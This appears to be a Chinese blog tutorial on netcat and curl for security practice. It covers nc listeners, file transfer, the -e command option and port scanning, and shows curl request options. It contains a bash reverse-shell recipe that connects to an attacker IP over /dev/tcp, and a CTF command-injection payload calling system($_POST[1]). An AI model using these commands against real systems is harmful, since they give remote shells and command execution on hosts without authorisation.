[huayang]
NC
nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据
实验环境
操作系统 | IP地址 |
---|---|
kali 2021 | 172.16.231.128 |
macOS | 172.16.231.1 |
简单的交互
-l:使用监听模式,监控传入的信息
macOS开启监听
kali链接2333
输入的任何信息都会被对方看见
公网也是可以的
上传文件到远程
测试的时候确定一下服务器当前测试目录和本地有无相同文件
在CentOS远程服务器运行:
nc -lv 2333 > 1.php
在kali上运行
nc *.*.*.* 2333 < 1.php
弹出本地ip即为链接成功,在推出即可
看看文件是否有内容
注意:在本地上传的时候尽量用ip,如果用域名进行上传则会出现文件无内容的情况
从远程下载文件到本地
以下很多功能我都无法复现,就直接转载国光师傅的文章
https://www.sqlsec.com/2019/10/nc.html
命令交互
-e
:将传入的信息以命令执行
这个应该被防火墙拦截了,无法实验
持久监听
-k
: 客户端断掉连接时,服务端依然保持运行-v
:现实指令执行过程细节
内网弹shell
ncat简单调整是可以穿内网的
操作系统 | IP地址 |
---|---|
macOS 10.13.6 | 内网 |
CentOS | www.sqlsec.com |
首先外网的CentOS服务器先监听本地端口:
-w
: 设置等待连线的时间秒数
bash弹shell
如果控制的目标机器自带的nc
不支持-e
选项,那如何将shell弹出去呢?这里可以利用自带的bash
命令交互环境来实现这个操作:
攻击者外网监听:
-p
port 本地端口
命令 | 参数解释 |
---|---|
bash -i | 产生一个bash交互环境 |
>& | 将联合符号前面的内容与后面结合然后一起重定向给后者 |
/dev/tcp/10.211.55.4/2333 | 让目标主机与主机10.211.55.4的2333端口简历一个连接 |
0>&1 | 将标准的输入与标准输出内容相结合,然后重定向给前面的标准输出内容 |
端口扫描
意义不大,实测不行,本地无法扫,云端无法精确识别
端口扫描
范围扫描
ncat不支持端口扫描,但是原始的nc可以扫描端口。
-n
: 直接使用ip地址,而不通过域名服务器-z
: 使用0输入/输出模式,只在扫描通信端口时使用
这里扫描10.211.55.14的20-25这个端口范围:Bash
# sqlsec @ X1cT34m-iMac in ~
$ nc -v -n -z 10.211.55.14 20-25
10.211.55.14 22 (ssh) open
可以发现成功扫描出22端口是开放的了
单个扫描
Bash
# sqlsec @ X1cT34m-iMac in ~
$ nc -v -z -n 10.211.55.14 22
10.211.55.14 22 (ssh) open
nc的命令可以写在一起的,下面两条命令的作用相同:Bash
$ nc -v -z -n 10.211.55.14 22
$ nc -vzn 10.211.55.14 22
CURL
获取页面响应内容
curl https://hellohy.top
获取请求头信息
curl -I https://hellohy.top
进行post传值
-d ""
curl "http://aaf32bea-1e67-468a-8a86-79bca7efa5d8.challenge.ctf.show:8080/?c=system(%24_POST[1]);" -d "1=ls"
注:这里的$(%24)必须要进行url编码
尽量c后面的全部进行url编码
修改请求头的ip
curl http://ctf5.shiyanbar.com/phpaudit/ -H "x-forwarded-for:127.0.0.1"
保存文件
curl -o index.html "https://hellohy.top/"
curl -o 1.png# https://hellohy.top/imgs/%E7%BD%91%E7%AB%99%E7%BB%93%E6%9E%84%20V2.0.png
文件后缀要和保存的文件格式一致
设置代理
curl -x 192.168.100.100:1080 http://www.linux.com
user-agent
curl -A “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.0)” http://www.linux.com
上传文件
curl -T dodo1.JPG -u 用户名:密码 ftp://www.linux.com/img/
向服务器发送 Cookie
curl -b 'foo=bar' https://google.com
[/huayang]
参考文章:
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论